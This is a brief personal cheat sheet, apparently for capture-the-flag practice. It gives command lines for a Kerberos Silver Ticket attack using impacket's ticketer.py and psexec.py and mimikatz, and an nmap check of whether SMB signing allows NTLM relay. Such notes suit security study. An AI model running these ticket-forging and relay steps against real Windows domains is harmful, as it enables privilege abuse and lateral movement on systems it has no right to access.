cheatsheet

6. Silver ticket craft valid TGS for a service after owning NTLM hash of an account gain access of that service by forging custom TGS with max privilege Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows) Linux ticketer.py -domain-sid SID -domain DOMAIN -spn SPN -nthash HASH USERNAME export KRB5CCNAME=USERNAME.ccache psexec.py DOMAIN\USERNAME@$IP -k -no-pass Windows .\mimikatz.exe kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME /service:SPN /target:DCHOSTNAME kerberos::ptt TICKET.kirbi or use Rubeus to do the same...

nmap --script=smb2-security-mode.nse -p445 $IP [[SMB Signing Check.png]] Note: Message signing enabled and required = cannot relay Message signing disabled or enabled but not required = can relay By default, normal workstations #2 while servers (DCs included) #1

just a bunch of notes for CTF